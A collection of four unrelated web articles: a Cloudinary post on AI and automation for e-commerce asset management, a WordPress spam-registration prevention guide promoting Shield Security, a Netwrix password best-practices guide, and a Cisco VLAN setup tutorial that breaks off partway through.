How AI and Automation Help E-Commerce Scale

WRITTEN BY THE CLOUDINARY TEAM FEB-07-2023 7 MIN READ

Post-pandemic, consumer reliance on online shopping remains steady, meaning e-commerce businesses need to continue to adopt new technologies to scale their business operations. 

Digital Asset Management (DAM) software can make it easier for creators to store, search, and organize their assets. Unfortunately, legacy DAM solutions are no longer sufficient to manage large volumes of product-related content. After all, using ‘old school’ DAM software requires a large staff who can manually optimize media and customize experiences for their audience—a practice that goes against agile methodology.

Staying competitive in today’s e-commerce environment requires brands to harness the power of AI and the efficiency of automation. A business using AI can quickly match audiences to relevant products and edit assets on the fly, creating more convenient and personalized shopping experiences. On the back-end, automation simplifies asset management, saving time and resources while increasing sales efficiency and marketing effectiveness.

Harnessing New Technology to Grow E-commerce

Copy link to this heading

During the pandemic, the US saw a 50% increase in e-commerce sales. This rapid shift to online shopping forced many businesses to find new asset management solutions. The right tool saves time for creative teams by taking on the labor involved in cropping, tagging, recoloring, background removal, and numerous other tedious tasks. AI tools can also automate higher-level functions, performing object recognition and asset categorization and efficiently organizing even legacy datasets.

Together, these tools free up a marketing team to address more strategic concerns, like finding opportunities to generate interest across new sales channels and touchpoints. 

E-commerce activity generates a lot of data that can be used for discovery. However, creators and developers can’t use what they can’t access, and studies show that 73% of data is never used for analytics. This wasted data is more than just lost revenue: Storing and transmitting data is expensive and also poses environmental concerns. To optimize asset delivery and extract the most valuable data from e-commerce activity, businesses must enhance their DAM tools with AI and automation.

AI and Automation for Scaling

Copy link to this heading

Let’s look at how AI and automation can help an e-commerce business achieve greater customer satisfaction, higher revenue, lower costs, happier employees, and more efficient and agile business operations.

Marketing

Copy link to this heading

Many websites collect cookies to track their customers’ buying patterns and enable personalized product recommendations. AI can analyze this information, so we can use it to automate outreach and customize customer campaigns and newsletters. 

Effective tools can provide extensible APIs to automate DAM and target specific user segments and devices. For example, Cloudinary’s Admin API lets you retrieve and manipulate asset metadata as part of an automated pipeline. In conjunction with Cloudinary’s object detection tools, it’s a powerful tool to modernize legacy databases.

Product

Copy link to this heading

Most companies offer flexible return policies to stay competitive in a market where customers cannot appraise a product in person before purchase. It’s expensive to provide the customer with this freedom—product returns cost companies millions of dollars annually. 

One of the most common reasons customers return products is because they feel they’ve received something different than what they saw before purchase, which could occur if the product page had insufficient photos or poor-quality images. For an e-commerce retailer, saving money by taking fewer photos is a false economy; a loss of revenue and the cost of processing returns can offset any savings.

AI-powered content creation helps ensure customers are happy with their purchases. For example, Cloudinary’s image and video transformation API provides a suite of tools to generate high-quality derivative assets from a small number of product images. For example, suppose you’re selling a sweater in a range of colors. Cloudinary’s image transformation API enables us to recolor a photo of it, so the product team only needs to photograph it once.

AI is also a powerful tool for matching visitors to the products they’re most likely to buy. By combining in-session user behavior patterns with cookies, an AI-based system can recommend appropriately sized clothing that matches the customer’s style.

Then, when a potential buyer is matched to a product, we can use AI-powered tools to generate interest. For example, on Mazda’s purchase page, customers can apply 3D model transformation functions to create a 360-degree view of their vehicle build with all the personalized upgrade options and the color they’ve selected.

AI also enables customers to preview personalized products. If a clothing retailer offers the option to add a custom inscription or design, for example, then an AI-powered displacement map can show what the final product will look like much more clearly than a simple overlay.

We can implement much of this functionality with a tool like Cloudinary’s content-aware object detection add-on. When used alongside the AI-powered background removal tool, we can generate and edit image assets for any context. For instance, consider an automotive manufacturer with a database of automotive add-ons. An AI could analyze image assets and apply smart tags to categorize product options. If the manufacturer offers numerous upgrade options across a range of a dozen or more vehicles, this will save a lot of time and work. The technology can even help with cleaning up legacy databases and regaining control over lost or mislabeled assets.

Customer Service

Copy link to this heading

A well-organized asset database also creates happier customers. Suppose visitors to our storefront have access to a search field or chatbot for queries. In that case, we can combine this data with user behavior data we collected earlier and compare it against our meticulously and automatically tagged and organized product catalog.

As we integrate AI tools more deeply into our supply chain, we can also expect more efficient fulfillment as we optimize for customer preference, location, and even local weather. For example, we can integrate Cloudinary-managed assets with Next.js Middleware in Netlify to find out where visitors are located and inject shipping information. If customers find the status updates useful, they’re more likely to become repeat buyers.

AI also helps build customer trust. AI-powered tools can automatically synchronize sales across multiple devices, identify high-risk transactions, and offer discounts to loyal customers more intelligently than rule-based implementations would. We can even use virtual assistants to handle administrative tasks that impact the end-user experience. 

For example, AI can help a storefront become more responsive by determining which media assets should be cached locally in a Content Delivery Network (CDN) or by identifying the most routine customer queries and offloading them to automated chatbots. An apparel storefront can provide a more bespoke experience by offering AI-powered fit and sizing assistance or even suggestions for complementary wardrobe choices.

When a customer decides to purchase, AI can help us ensure we’ve minimized human error in the inventory handling and fulfillment stages. If our product has a loyal following, we can keep customers engaged by providing AI-optimized, up-to-date stock arrival notifications.

If we allow end users to create their own content, such as photos in product reviews (or if we’re using AI to pull from external content stores), we should use a tool like Cloudinary’s asset moderation. Depending on the type and volume of content, we can configure these add-ons to flag content for manual or automatic review or a combination of both. For instance, we might want to automatically reject some content, such as low-quality images or images that have not been anonymized. Other content might need human approval, such as automatically smart-tagged product images. 

Sales

Copy link to this heading

To be competitive in sales within a digital ecosystem, you often need to analyze trends in external data. AI tools help us stay competitive with comprehensive industry monitoring and analysis. Rather than manually searching for a competitive edge, we can feed raw data into our models and expect better insights—notably, often without needing to perform the tedious process of data normalization.

Another common necessity of e-commerce businesses—namely, complex integrations—can break continuity between upstream and downstream portions of the sales pipeline, especially when integrating legacy applications. This process can create extra work and delays for the sales team, who either have to troubleshoot integrations or rely on support teams or developer teams to make changes. AI-powered automation can solve this issue and create a more extensible and easy-to-use pipeline for the sales team.

Financial Processing

Copy link to this heading

In an e-commerce business, payroll, accounting, and invoicing are all digital (and often cloud-first) processes. This makes them ideally suited to administrative automation and AI.

Cloudinary’s broad set of integrations enables Cloudinary-managed assets to be deployed through commercial platforms, like Adobe Commerce (formerly Magento) or Salesforce. We get the benefits of the financial tooling of top e-commerce and marketing frameworks while delivering quality, relevant content that’s been automatically curated by asset management technologies.

Ride the E-Commerce Wave

Copy link to this heading

To grow an e-commerce business in a cloud-first world, you need the help of cutting-edge technologies. In the DAM space, AI can make the difference between a digital storefront that needs constant manual labor to stay effective and an e-commerce business that’s ready to sail the tide of internet commerce. To start integrating AI into your business plan, visit Cloudinary today.

Source :
https://cloudinary.com/blog/how-ai-and-automation-help-e-commerce-scale

Prevent spam user registration in WordPress: 2024 guide

JANUARY 20, 2024 BY PAUL G.

Spam registrations are common on WordPress websites. WordPress is the most popular content management system in the world, with over 60 percent market share. This makes it a prime target for scammers. It’s also, unfortunately, easy to create fake user accounts on the platform, requiring only an account name, email address, and password – all things spammers can simply invent. 

Fake registrations can cause extensive issues, such as hogging resources, spreading malware, and creating an unmanageable user base. 

WordPress doesn’t have a default functionality to combat spam user registrations, butthe good news is that plugins like Shield Security PRO can fill in the gap. Let’s take a look at some strategies for preventing spam user registrations. 

Introduction to spam registrations in WordPress 

WordPress spam registrations are when spammers create accounts on sites without any intention of using them for authentic purposes. Typically, spammers use automated programs or bots to create these accounts. Spammers may also use bots and spam accounts for phishing purposes, trying to acquire sensitive information from users and webmasters to compromise their security. 

Website owners often underestimate the harm spam registrations can cause. These range from immediate annoyances to long-term security problems and data distortion. 

For example, spam registrations can clog your inbox, causing surges of email notifications informing you of fake sign-ups for your website. Processing and deleting these emails and accounts without getting rid of legitimate users is time-consuming and challenging. 

Spam registrations can also overload server resources, affecting performance. Spam bots can make frequent login attempts, using up your bandwidth and making your website run slower for legitimate users. 

There can also be some considerable long-term consequences. Users may tire of spam comments and stop interacting with your content. You may also struggle to analyse user data, distorting your view of how your site is functioning. This can lead to security vulnerabilities and damage your site’s SEO. 

Strategies to prevent WordPress user registration spam 

This section covers various strategies and techniques that you can implement to prevent new user registration spam and improve the overall security of your WordPress site.

Install a WordPress security plugin

The first strategy is to install a WordPress security plugin. Choosing the right security plugin not only helps prevent spam registrations on your WordPress site, but it also gives you access to a wide range of security features.

Shield Security PRO is the best plugin for improving the overall security of your WordPress site. The plugin’s key features include bad bot detection and blocking, invisible CAPTCHA codes, human and bot spam prevention, traffic rate limiting, and malware scanning. 

A screenshot of Shield Security PRO’s feature comparison. 

Here’s a rundown of Shield Security PRO’s features and how they can help protect your site:

Disable WordPress registration

Using a plugin like ShieldPRO is the best choice to ensure the ongoing security of your WordPress site. However, there are also manual methods you can employ to help prevent user registration spam.

Disabling user registration in WordPress is one strategy. This approach eliminates the problem of spam signups entirely. You could try this option if you don’t need to collect user information, run a website with limited resources, or simply want to provide audiences with information for free.

The steps to disable registration on your WordPress site are as follows: 

  1. From the WordPress dashboard, go to Settings > General.
  2. Next, go to “Membership” and uncheck the “Anyone can register” box.

It’s worth considering that this technique prevents you from collecting visitor details, which stops you from building email lists or marketing directly to your audience. It also reduces personalisation opportunities and limits community building. 

Add CAPTCHA to your user registration form

You can also try adding CAPTCHA to your user registration form. This prevents automated spam registrations by identifying bots before they can create accounts. 

Various forms of CAPTCHA plugins for your site exist, including: 

  • reCAPTCHA: Google reCAPTCHA is a free service that combines text and images in a user-friendly interface, designed to weed out bots
  • hCAPTCHA: hCAPTCHA is a free service that uses images and action-based tests to identify bots. This service is customisable and prioritises user privacy. 

ShieldPRO’s AntiBot Detection Engine (ADE) avoids the need to use CAPTCHA at all. Since the plugin automatically detects and blocks bots, there’s no reason to test your visitors for signs of nuts and bolts. 

Implement geoblocking

You can also try geoblocking, a security method that limits website access to specific regions. It works by filtering IP addresses by location, only letting specific IPs enter the site. 

Geoblocking prevents spam from regions known for high levels of malicious activity. However, it also comes with various drawbacks. For example, it causes false positives, blocking legitimate site users just because they are in the wrong country. Spammers can also bypass it with proxy sites and VPNs.

Fortunately, ShieldPRO’s automated IP blocking technology more accurately and effectively stops spam users by blocking them after a specified number of offences. It detects malicious activity regardless of the traffic’s origin. 

Require manual approval for user registration

Manual user approvals can also mitigate spam registrations, offering significant benefits. The approach drastically reduces the chances of bot sign-up while also permitting you to collect legitimate user details. 

Drawbacks include the time-intensive nature of this method and the lack of scalability for larger WordPress sites. You may need to hire multiple full-time operatives to manage website administration, which can get pricey, fast.

Turn on email activation for user registration

Email activation for user registration is another popular technique to guard against spam registrations. It works by getting users to click a link in their email account to verify their details. 

Screenshot of Shield Security PRO’s email verification settings.

Shield Security PRO features a built-in email-checking feature. This tests to see if the email has a valid structure and is registered to a legitimate domain. It also checks if there are any mail exchange records for the domain, and determines if the email address goes to a disposable domain. These checks help to flag fake and temporary email addresses in user registrations. 

Block spam IP addresses

One of the primary ways Shield Security PRO works is by blocking malicious IP addresses once they’ve behaved badly enough to qualify as a bot. There is no one clear action an IP address can do on your site that proves it’s a bot. However, certain patterns of behaviour give bots away clear as day. 

“When you look at the activity as a whole” says Paul Goodchild, creator of Shield Security PRO, “a bot’s activity on a site is clearly distinguishable from human users.” 

The plugin then uses this clear indication as a signal to block the IP address entirely, stopping malicious activity in its tracks. The plugin also uses CrowdSec technology to minimise the risk of false positives and enable as many legitimate sign-ups as possible. 

Secure your WordPress site with ShieldPRO today 

The damaging impact of spam user registrations can be substantial. It can cause clogged inboxes, distorted user analytics, and server overload. The long-term consequences are diminished website SEO, reputational damage, and security vulnerabilities due to phishing and malware. 

Fortunately, there are various methods to prevent spam user registrations on WordPress websites. The most effective option is to use a plugin like Shield SecurityPRO. This plugin keeps malicious bots off your website. Since most spam user registrations come from bots, this means you can rest a lot easier. 

Try ShieldPRO on their WordPress sites today with a 14-day money-back guarantee. Install it to maximise your WordPress security and get some well-earned peace of mind.

Hey gorgeous!

If you’re curious about ShieldPRO and would like to explore the powerful features for protecting your WordPress sites, click here to get started today. (14-day satisfaction guarantee!)

You’ll get all PRO features, including AI Malware Scanning, WP Config File Protection, Plugin and Theme File Guard, import/export, exclusive customer support, and so much more.

TRY SHIELDPRO TODAY →

Source :
https://getshieldsecurity.com/blog/stop-spam-registrations-wordpress/

The Ultimate Guide to Password Best Practices: Guarding Your Digital Identity

Dirk Schrader
Published: November 14, 2023
Updated: November 24, 2023

In the wake of escalating cyber-attacks and data breaches, the ubiquitous advice of “don’t share your password” is no longer enough. Passwords remain the primary keys to our most important digital assets, so following password security best practices is more critical than ever. Whether you’re securing email, networks, or individual user accounts, following password best practices can help protect your sensitive information from cyber threats.

Read this guide to explore password best practices that should be implemented in every organization — and learn how to protect vulnerable information while adhering to better security strategies.

The Secrets of Strong Passwords

A strong password is your first line of defense when it comes to protecting your accounts and networks. Implement these standard password creation best practices when thinking about a new password:

  • Complexity: Ensure your passwords contain a mix of uppercase and lowercase letters, numbers, and special characters. It should be noted that composition rules, such as lowercase, symbols, etc. are no longer recommended by NIST — so use at your own discretion.
  • Length: Longer passwords are generally stronger — and usually, length trumps complexity. Aim for at least 6-8 characters.
  • Unpredictability: Avoid using common phrases or patterns. Avoid using easily guessable information like birthdays or names. Instead, create unique strings that are difficult for hackers to guess.

Handpicked related content:

Combining these factors makes passwords harder to guess. For instance, if a password is 8 characters long and includes uppercase letters, lowercase letters, numbers and special characters, the total possible combinations would be (26 + 26 + 10 + 30)^8. This astronomical number of possibilities makes it exceedingly difficult for an attacker to guess the password.

Of course, given NIST’s updated guidance on passwords, the best approach to effective password security is using a password manager — this solution will not only help create and store your passwords, but it will automatically reject common, easy-to-guess passwords (those included in password dumps). Password managers greatly increase security against the following attack types.

Password-Guessing Attacks

Understanding the techniques that adversaries use to guess user passwords is essential for password security. Here are some of the key attacks to know about:

Brute-Force Attack

In a brute-force attack, an attacker systematically tries every possible combination of characters until the correct password is found. This method is time-consuming but can be effective if the password is weak.

Strong passwords help thwart brute force attacks because they increase the number of possible combinations an attacker must try, making it unlikely they can guess the password within a reasonable timeframe.

Dictionary Attack

A dictionary attack is a type of brute-force attack in which an adversary uses a list of common words, phrases and commonly used passwords to try to gain access.

Unique passwords are essential to thwarting dictionary attacks because attackers rely on common words and phrases. Using a password that isn’t a dictionary word or a known pattern significantly reduces the likelihood of being guessed. For example, the string “Xc78dW34aa12!” is not in the dictionary or on the list of commonly used passwords, making it much more secure than something generic like “password.”

Dictionary Attack with Character Variations

In some dictionary attacks, adversaries also use standard words but also try common character substitutions, such as replacing ‘a’ with ‘@’ or ‘e’ with ‘3’. For example, in addition to trying to log on using the word “password”, they might also try the variant “p@ssw0rd”.

Choosing complex and unpredictable passwords is necessary to thwart these attacks. By using unique combinations and avoiding easily guessable patterns, you make it challenging for attackers to guess your password.

How Password Managers Enhance Security

Password managers are indispensable for securely storing and organizing your passwords. These tools offer several key benefits:

  • Security: Password managers store passwords and enter them for you, eliminating the need for users to remember them all. All users need to remember is the master password for their password manager tool. Therefore, users can use long, complex passwords as recommended by best practices without worrying about forgetting their passwords or resorting to insecure practices like writing passwords down or reusing the same password for multiple sites or applications.
  • Password generation: Password managers can generate a strong and unique password for user accounts, eliminating the need for individuals to come up with them.
  • Encryption: Password managers encrypt password vaults, ensuring the safety of data — even if it is compromised.
  • Convenience: Password managers enable users to easily access passwords across multiple devices.

When selecting a password manager, it’s important to consider your organization’s specific needs, such as support for the platforms you use, price, ease of use and vendor breach history. Conduct research and read reviews to identify the one that best aligns with your organization’s requirements. Some noteworthy options include Netwrix Password Secure, LastPass, Dashlane, 1Password and Bitwarden.

How Multifactor Authentication (MFA) Adds an Extra Layer of Security

Multifactor authentication strengthens security by requiring two or more forms of verification before granting access. Specifically, you need to provide at least two of the following authentication factors:

  • Something you know: The classic example is your password.
  • Something you have: Usually this is a physical device like a smartphone or security token.
  • Something you are: This is biometric data like a fingerprint or facial recognition.

MFA renders a stolen password worthless, so implement it wherever possible.

Password Expiration Management

Password expiration policies play a crucial role in maintaining strong password security. Using a password manager that creates strong passwords also has an influence on password expiration. If you do not use a password manager yet, implement a strategy to check all passwords within your organization; with a rise in data breaches, password lists (like the known rockyou.txt and its variations) used in brute-force attacks are constantly growing. The website haveibeenpawned.com offers a service to check whether a certain password has been exposed. Here’s what users should know about password security best practices related to password expiration:

  • Follow policy guidelines: Adhere to your organization’s password expiration policy. This includes changing your password when prompted and selecting a new, strong password that meets the policy’s requirements.
  • Set reminders: If your organization doesn’t enforce password expiration via notifications, set your own reminders to change your password when it’s due. Regularly check your email or system notifications for prompts.
  • Avoid obvious patterns: When changing your password, refrain from using variations of the previous one or predictable patterns like “Password1,” “Password2” and so on.
  • Report suspicious activity: If you notice any suspicious account activity or unauthorized password change requests, report them immediately to your organization’s IT support service or helpdesk.
  • Be cautious with password reset emails: Best practice for good password security means being aware of scams. If you receive an unexpected email prompting you to reset your password, verify its authenticity. Phishing emails often impersonate legitimate organizations to steal your login credentials.

Password Security and Compliance

Compliance standards require password security and password management best practices as a means to safeguard data, maintain privacy and prevent unauthorized access. Here are a few of the laws that require password security:

  • HIPAA (Health Insurance Portability and Accountability Act): HIPAA mandates that healthcare organizations implement safeguards to protect electronic protected health information (ePHI), which includes secure password practices.
  • PCI DSS (Payment Card Industry Data Security Standard): PCI DSS requires organizations that handle payment card data on their website to implement strong access controls, including password security, to protect cardholder data.
  • GDPR (General Data Protection Regulation): GDPR requires organizations that store or process the data of EU residents to implement appropriate security measures to protect personal data. Password security is a fundamental aspect of data protection under GDPR.
  • FERPA (Family Educational Rights and Privacy Act): FERPA governs the privacy of student education records. It includes requirements for securing access to these records, which involves password security.

Organizations subject to these compliance standards need to implement robust password policies and password security best practices. Failure to do so can result in steep fines and other penalties.

There are also voluntary frameworks that help organizations establish strong password policies. Two of the most well known are the following:

  • NIST Cybersecurity Framework: The National Institute of Standards and Technology (NIST) provides guidelines and recommendations, including password best practices, to enhance cybersecurity.
  • ISO 27001: ISO 27001 is an international standard for information security management systems (ISMSs). It includes requirements related to password management as part of its broader security framework.

Password Best Practices in Action

Now, let’s put these password security best practices into action with an example:

Suppose your name is John Doe and your birthday is December 10, 1985. Instead of using “JohnDoe121085” as your password (which is easily guessable), follow these good password practices:

  • Create a long, unique (and unguessable) password, such as: “M3an85DJ121!”
  • Store it in a trusted password manager.
  • Enable multi-factor authentication whenever available.

10 Password Best Practices

If you are looking to strengthen your security, follow these password best practices:

  • Remove hints or knowledge-based authentication: NIST recommends not using knowledge-based authentication (KBA), such as questions like “What town were you born in?” but instead, using something more secure, like two-factor authentication.
  • Encrypt passwords: Protect passwords with encryption both when they are stored and when they are transmitted over networks. This makes them useless to any hacker who manages to steal them.
  • Avoid clear text and reversible forms: Users and applications should never store passwords in clear text or any form that could easily be transformed into clear text. Ensure your password management routine does not use clear text (like in an XLS file).
  • Choose unique passwords for different accounts: Don’t use the same, or even variations, of the same passwords for different accounts. Try to come up with unique passwords for different accounts.
  • Use a password management: This can help select new passwords that meet security requirements, send reminders of upcoming password expiration, and help update passwords through a user-friendly interface.
  • Enforce strong password policies: Implement and enforce strong password policies that include minimum length and complexity requirements, along with a password history rule to prevent the reuse of previous passwords.
  • Update passwords when needed: You should be checking and – if the results indicate so – updating your passwords to minimize the risk of unauthorized access, especially after data breaches.
  • Monitor for suspicious activity: Continuously monitor your accounts for suspicious activity, including multiple failed login attempts, and implement account lockouts and alerts to mitigate threats.
  • Educate users: Conduct or partake in regular security awareness training to learn about password best practices, phishing threats, and the importance of maintaining strong, unique passwords for each account.
  • Implement password expiration policies: Enforce password expiration policies that require password changes at defined circumstances to enhance security.

How Netwrix Can Help

Adhering to password best practices is vital to safeguarding sensitive information and preventing unauthorized access.

Netwrix Password Secure provides advanced capabilities for monitoring password policies, detecting and responding to suspicious activity and ensuring compliance with industry regulations. With features such as real-time alerts, comprehensive reporting and a user-friendly interface, it empowers organizations to proactively identify and address password-related risks, enforce strong password policies, and maintain strong security across their IT environment.

Conclusion

In a world where cyber threats are constantly evolving, adhering to password management best practices is essential to safeguard your digital presence. First and foremost, create a strong and unique password for each system or application — remember that using a password manager makes it much easier to adhere to this critical best practice. In addition, implement multifactor authentication whenever possible to thwart any attacker who manages to steal your password. By following the guidelines, you can enjoy a safer online experience and protect your valuable digital assets.

Dirk Schrader

Dirk Schrader is a Resident CISO (EMEA) and VP of Security Research at Netwrix. A 25-year veteran in IT security with certifications as CISSP (ISC²) and CISM (ISACA), he works to advance cyber resilience as a modern approach to tackling cyber threats. Dirk has worked on cybersecurity projects around the globe, starting in technical and support roles at the beginning of his career and then moving into sales, marketing and product management positions at both large multinational corporations and small startups. He has published numerous articles about the need to address change and vulnerability management to achieve cyber resilience.

Source :
https://blog.netwrix.com/2023/11/15/password-best-practices/

How to Set Up a VLAN

Diego Asturias UPDATED: July 11, 2023


If you want to improve your network security and performance, learning how to set up a VLAN properly is all you need. Virtual LANs are powerful networking tools that allow you to segment your network into logical groups and isolate traffic between them.

In this post, we will go through the steps required to set up a VLAN in your network. We will configure two switches along with their interfaces and VLANs, respectively.

So, let’s dive in and learn how to set up VLANs and take your network to the next level.

Table of Contents

  • What is a VLAN?
  • Preparing for VLAN configuration
    • Our Lab
    • Network Diagram
  • How to set up a VLAN on a Switch?
    • Let’s connect to the Switch
    • Configure VLANs
    • Assign switch ports to VLANs
    • Configure trunk ports
  • Extra Configuration to Consider

What is a VLAN?

Before we go deep into learning how to set up a VLAN and provide examples, let’s understand the foundations of VLANs (or Virtual Local Area Networks).

In a nutshell, VLANs are logical groupings of devices that rely on Layer 2 addresses (MAC) for communication. VLANs are implemented to segment a physical network (or large Layer two broadcast domains) into multiple smaller logical networks (isolated broadcast domains).

Each VLAN behaves as a separate network with its own broadcast domain. VLANs help prevent broadcast storms (extreme amounts of broadcast traffic). They also help control traffic and overall improve network security and performance.

Preparing for VLAN configuration

Although VLANs are usually left for Layer 2 switches, in reality, any device (including routers and L3 switches) with switching capabilities and support of VLAN configuration should be an excellent fit for VLANs. In addition, VLANs are supported by different vendors, and since each vendor has a different OS and code, the way the VLANs are configured may slightly change.

Furthermore, you can also use specific software such as network diagramming and simulation to help you create network diagrams and test your configuration.

Our Lab

We will configure a popular Cisco (IOS-based) switch for demonstration purposes. We will use Boson NetSim (a network simulator for Cisco networking hardware and software) to run Cisco IOS simulated commands. This simulation is like you were configuring an actual Cisco switch or router.

Network Diagram

To further illustrate how to set up a VLAN, we will work on the following network diagram. We will configure two VLANs in two different switches. We will then configure each port on the switches connected to a PC. We will then proceed to configure the trunk port, which is vital for VLAN traffic.

Network Diagram

Network diagram details

  • S2 and S3 (Switch 2 and Switch 3) – Two Cisco L2 Switches connecting PCs at different VLANs (VLAN 10 and VLAN 20) via Fast Ethernet interfaces.
  • VLANs 10 and VLAN20. These VLANs configured in L2 switches (S2 and S3) create a logical grouping of PCs within the network. In addition, each VLAN gets a name, VLAN 10 (Engineering) and VLAN 20 (Sales).
  • PCs. PC1, PC2, PC3, and PC4 are each connected to a specific L2 switch.

How to set up a VLAN on a Switch?

So now that you know the VLAN configuration we will be using, including the number of switches, VLAN ID, VLAN name, and the devices or ports that will be part of the configuration, let’s start setting up the VLANs.

Note: VLAN configuration is just a piece of the puzzle. Switches also need proper interface configuration, authentication, access, etc. To learn how to correctly connect and configure everything else, follow the step-by-step guide on how to configure a Cisco Switch. 

a. Let’s connect to the switch

Inspect your hardware and find the console port. This port is usually located on the back of your Cisco switch. You can connect to the switch’s “console port” using a console cable (or rollover). Connect one end of the console cable to the switch’s console port and the other to your computer’s serial port.

Note: Obviously, not all modern computers have serial ports. Some modern switches come with a Mini USB port or AUX port to help with this. But if your hardware doesn’t have these ports, you can also connect to the switch port using special cables like an RJ-45 rollover cable, a Serial DB9-to-RJ-45 console cable, or a serial-to-USB adapter. 

  • Depending on your switch’s model, you can configure it via Command Line Interface (CLI) or Graphical User Interface (GUI). We will connect to the most popular user interface: The IOS-based CLI. 
  • To connect to your switch’s IOS-based CLI, you must use a terminal emulator on your computer, such as PuTTY or SecureCRT.
  • You’ll need to configure the terminal emulator to use the correct serial port and set the baud rate to 9600. Learn how to properly set these parameters in the Cisco switching configuration guide.
  • In the terminal emulator, press Enter to activate the console session. The Cisco switch should display a prompt asking for a username and password.
  • Enter your username and password to log in to the switch.
connect to the switch

b. Configure VLANs

According to our previously shown network diagram, we will need two VLANs; VLAN 10 and VLAN 20.

  • To configure Layer 2 switches, you need to enter the privileged EXEC mode by typing “enable” and entering the password (if necessary).
  • Enter the configuration mode by typing “configure terminal.”
  • Create the VLAN with “vlan <vlan ID>” (e.g., “vlan 10”).
  • Name the VLAN by typing “name <vlan name>” (e.g., “name Sales”).
  • Repeat these two steps for each VLAN you want to create.

Configuration on Switch 2 (S2)

S2# configure terminal

S2(config)# vlan 10

S2(config-vlan)# name Engineering

S2(config-vlan)# end

S2# configure terminal

S2(config)# vlan 20

S2(config-vlan)# name Sales

S2(config-vlan)# end

Use the “show vlan” command to see the configured VLANs. From the output below, you’ll notice that the two new VLANs 10 (Engineering) and 20 (Sales) are indeed configured and active but not yet assigned to any port.

Configure VLANs

Configuration on Switch 3 (S3)

S3# configure terminal

S3(config)# vlan 10

S3(config-vlan)# name Engineering

S3(config-vlan)# end

S3# configure terminal

S3(config)# vlan 20

S3(config-vlan)# name Sales

S3(config-vlan)# end

Configuration on Switch 3 (S3)

Note: From the output above, you might have noticed VLAN 1 (default), which is currently active and is assigned to all the ports in the switch. This VLAN, also known as native VLAN, is the default VLAN on most Cisco switches. It is used for untagged traffic on a trunk port. This means that all traffic that is not explicitly tagged with VLAN information will be sent to this default VLAN. 

Now, let’s remove those VLAN 1 tags from interfaces Fa0/2 and Fa0/3. Or in simple words let’s assign the ports to our newly created VLANs.

c. Assign switch ports to VLANs

In the previous section, we created our VLANs; now, we must assign the appropriate switch ports to the correct VLANs. The proper steps to assign switch ports to VLANs are as follows:

  • Enter configuration mode. Remember to run these commands under the configuration mode (configure terminal).
  • Assign ports to the VLANs by typing “interface <interface ID>” (e.g., “interface GigabitEthernet0/1”).
  • Configure the port as an access port by typing “switchport mode access”
  • Assign the port to a VLAN by typing “switchport access vlan <vlan ID>” (e.g., “switchport access vlan 10”).
  • Repeat these steps for each port you want to assign to a VLAN.

Let’s refer to a section of our network diagram

network diagram

Configuration on Switch 2 (S2)

S2(config)# interface fastethernet 0/2

S2(config-if)# switchport mode access

S2(config-if)# switchport access vlan 10

S2(config)# interface fastethernet 0/3

S2(config-if)# switchport mode access

S2(config-if)# switchport access vlan 20

Configuration on Switch 2 (S2)

Use the “show running-configuration” to see the new configuration taking effect on the interfaces.

Configuration on Switch 3 (S3)

S3(config)# interface fastethernet 0/2

S3(config-if)# switchport mode access

S3(config-if)# switchport access vlan 10

S3(config)# interface fastethernet 0/3

S3(config-if)# switchport mode access

S3(config-if)# switchport access vlan 20

Configuration on Switch 3 (S3)

A “show running-configuration” can show you our configuration results.

show running-configuration

d. Configure trunk ports

Trunk ports are a type of switch port mode (just like access) that perform essential tasks like carrying traffic for multiple VLANs between switches, tagging VLAN traffic, supporting VLAN management, increasing bandwidth efficiency, and allowing inter-VLAN routing.

If we didn’t configure trunk ports between our switches, the PCs couldn’t talk to each other on different switches, even if they were on the same VLAN.

Here’s a step by step to configuring trunk ports

  • Configure a trunk port to carry traffic between VLANs by typing “interface <interface ID>” (e.g., “interface FastEthernet0/12”).
  • Set the trunk encapsulation method (dot1q). The IEEE 802.1Q (dot1q) trunk encapsulation method is the standard tagging Ethernet frames with VLAN information.
  • Configure the port as a trunk port by typing “switchport mode trunk”.
  • Repeat the steps for each trunk port you want to configure.

Note (on redundant trunk links): To keep our article simple, we will configure one trunk link. However, keep in mind that any good network design (including trunk links) would need redundancy. One trunk link between switches is not an optimal redundant solution for networks on production. To add redundancy, we recommend using EtherChannel to bundle physical links together and configure the logical link as a trunk port. You can also use Spanning Tree Protocol (STP) by using the “spanning-tree portfast trunk” command.

Let’s refer to our network diagram

network diagram

Configuration on Switch 2 (S2)

S2(config)# interface fastethernet 0/12

S2(config-if)# switchport trunk encapsulation dot1q

S2(config-if)# switchport mode trunk

S2(config-if)# exit

Configuration on Switch 2 (S2)

Configuration on Switch 3 (S3)

S3(config)# interface fastethernet 0/24

S3(config-if)# switchport trunk encapsulation dot1q

S3(config-if)# switchport mode trunk

S3(config-if)# exit

Configuration on Switch 3 (S3)

Note: You can use different types of trunk encapsulation such as dot1q and ISL, just make sure both ends match the type of encapsulation.

Extra Configuration to Consider

Once you finish with VLAN and trunk configuration, remember to test VLAN connectivity between PCs, you can do this by configuring the proper IP addressing and doing a simple ping. Below are other key configurations related to your new VLANs that you might want to consider.

a. Ensure all your interfaces are up and running

To ensure that your interfaces are not administratively down, issue a “no shutdown” (or ‘no shut’) command on all those newly configured interfaces. Additionally, you can also use the “show interfaces” to see the status of all the interfaces.

no shutdown command

b. (Optional) enable inter-VLAN

VLANs, as discussed earlier, separate broadcast domains (Layer 2) — they do not know how to route IP traffic because Layer 2 devices like switches can’t accept IP address configuration on their interfaces. To allow inter-VLAN communication (PCs on one VLAN communicate with PCs on another VLAN), you would need to use a Layer 3 device (a router or L3 switch) to route traffic.

There are three ways to implement inter-VLAN routing: an L3 router with multiple Ethernet interfaces, an L3 router with one router interface using subinterfaces (known as Router-On-a-Stick), and an L3 switch with SVI.

We will show a step-by-step on how to configure Router-On-a-Stick for inter-VLAN communications. 

  • Connect the router to one switch via a trunk port.
  • Configure subinterfaces on the router for each VLAN (10 and 20 in our example). To configure subinterfaces, use the “interface” command followed by the VLAN number with a period and a subinterface number (e.g., “interface FastEthernet0/0.10” for VLAN 10). For example, to configure subinterfaces for VLANs 10 and 20, you would use the following commands:

> router(config)# interface FastEthernet 0/0

> router(config-if)# no shutdown

> router(config-if)# interface FastEthernet 0/0.10

> router(config-subif)# encapsulation dot1Q 10

> router(config-subif)# ip address 192.168.10.1 255.255.255.0

> router(config-subif)# interface FastEthernet 0/0.20

> router(config-subif)# encapsulation dot1Q 20

> router(config-subif)# ip address 192.168.20.1 255.255.255.0

  • Configure a default route on the router using the “ip route” command. This is a default route to the Internet through a gateway at IP address 192.168.1.1. For example:

